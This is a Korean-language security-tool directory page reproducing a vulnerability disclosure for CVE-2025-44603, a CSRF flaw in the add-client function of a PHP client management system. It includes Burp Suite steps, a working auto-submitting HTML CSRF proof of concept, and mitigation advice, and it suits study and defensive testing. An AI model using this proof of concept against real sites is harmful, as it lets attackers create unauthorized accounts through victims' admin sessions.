Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-44603-CSRF-Leads_to_Create_FakeUsers — PHP 기반 클라이언트 관리 시스템에서 CSRF 취약점을 시연하는 개념 증명으로, HTML 익스플로잇 코드와 웹 애플리케이션 보안 테스트를 위한 완화 전략을 포함합니다. | Kitploit
도구/GitHubGitHub/moulish2004/cve-2025-44603-csrf-leads_to_create_fakeusers
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration TestingLearning & Education
GitHubmoulish2004/cve-2025-44603-csrf-leads_to_create_fakeusers

CVE-2025-44603-CSRF-Leads_to_Create_FakeUsers

PHP 기반 클라이언트 관리 시스템에서 CSRF 취약점을 시연하는 개념 증명으로, HTML 익스플로잇 코드와 웹 애플리케이션 보안 테스트를 위한 완화 전략을 포함합니다.

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
11년 전아직 검토되지 않음

CVE-2025-44603 (CSRF 취약점: 가짜 클라이언트 생성)

프로젝트 이름 및 저장소 URL : https://phpgurukul.com/client-management-system-using-php-mysql/

취약점 이름 : Cross-Site Request Forgery(CSRF)

영향을 받는 버전 : V1.2

소개

PHPGurukul에서 개발한 클라이언트 관리 시스템의 클라이언트 추가 기능에 CSRF(Cross-Site Request Forgery) 취약점이 존재합니다. CSRF는 인증된 사용자가 웹 애플리케이션에 악의적인 요청을 제출하도록 속이는 공격입니다. 이로 인해 사용자 모르게 권한 없는 작업이 수행될 수 있습니다. 이 보고서에서는 CSRF를 사용하여 클라이언트 관리 시스템에 가짜 사용자를 생성하는 방법을 시연하고 완화 전략을 제안합니다.

환경 설정

  • MySQL과 PHP를 사용하여 로컬에서 호스팅되는 클라이언트 관리 시스템.
  • 클라이언트 및 해당 서비스를 추가하는 기능.

CSRF 악용 단계

1. 관리자로 로그인

제공된 자격 증명을 사용하여 클라이언트 관리 시스템에 로그인합니다.

Login as admin

2. 새 클라이언트 추가

  • 클라이언트 추가 옵션을 선택합니다.
  • 필요한 클라이언트 세부 정보를 입력합니다.

Adding new client Enter the client details

3. 클라이언트 추가 요청 캡처

  1. 저장 버튼으로 이동합니다.
  2. Burp Suite를 설정하여 요청을 가로챕니다.
  3. 저장을 클릭하고 서버에 도달하기 전에 HTTP 요청을 캡처합니다.
  4. 캡처된 요청을 세션 쿠키 없이 Repeater 탭으로 보내 분석합니다.

Capturing the request in Burp Send to repeater

가짜 클라이언트를 위한 CSRF 코드

다음은 CSRF 공격을 위한 HTML PoC입니다:

root@kitploit:~
<html>
  <body>
    <form action="http://localhost/clientms/admin/add-client.php" method="POST">
      <input type="hidden" name="accounttype" value="Active Account" />
      <input type="hidden" name="cname" value="moulimurugan" />
      <input type="hidden" name="comname" value="kppr" />
      <input type="hidden" name="address" value="vijayamangalam" />
      <input type="hidden" name="city" value="erode" />
      <input type="hidden" name="state" value="tamil" />
      <input type="hidden" name="zcode" value="638026" />
      <input type="hidden" name="wphnumber" value="968560710" />
      <input type="hidden" name="cellphnumber" value="6931052465" />
      <input type="hidden" name="ophnumber" value="9638560410" />
      <input type="hidden" name="email" value="[email protected]" />
      <input type="hidden" name="password" value="moulimurugan" />
      <input type="hidden" name="websiteadd" value="clientmsdb" />
      <input type="hidden" name="notes" value="Nil" />
      <input type="hidden" name="submit" value="" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

가짜 클라이언트 생성

  • 기존 세부 정보를 수정하여 가짜 클라이언트를 생성합니다.

Adding fake user 1 Adding fake user 2

CSRF PoC 테스트

  1. 생성된 CSRF PoC 링크를 브라우저에서 엽니다.
  2. 웹페이지에 제출 버튼이 나타납니다.
  3. 제출을 클릭하면 요청이 실행되어 가짜 클라이언트가 생성됩니다.

Open PoC in browser Hit submit request

가짜 클라이언트 생성 확인

  • 제출 후 관리자 대시보드에 가짜 클라이언트가 나타납니다.

Fake clients created Multiple users created

완화 전략

CSRF 공격을 방지하려면 다음 조치를 구현하십시오:

  1. CSRF 토큰
    • 모든 양식 제출에 anti-CSRF 토큰을 사용하고 서버 측에서 검증합니다.
  2. SameSite 쿠키
    • 세션 쿠키에 SameSite=Strict 또는 SameSite=Lax 속성을 설정합니다.
  3. Referer 및 Origin 헤더 검증
    • 요청을 처리하기 전에 Referer 및 Origin 헤더를 검증합니다.
  4. 사용자 인증 확인
    • 중요한 작업에 CAPTCHA를 요구하여 자동화된 공격을 방지합니다.
  5. HTTP 메서드 제한
    • 민감한 작업에는 POST를 사용하고 GET 요청으로 부작용이 발생하지 않도록 합니다.

결론

이 보고서는 CSRF 취약점을 악용하여 클라이언트 관리 시스템에서 승인되지 않은 클라이언트를 생성할 수 있는 방법을 보여줍니다. 제안된 완화 전략을 구현하면 애플리케이션을 이러한 공격으로부터 보호하는 데 도움이 됩니다.

도구 다운로드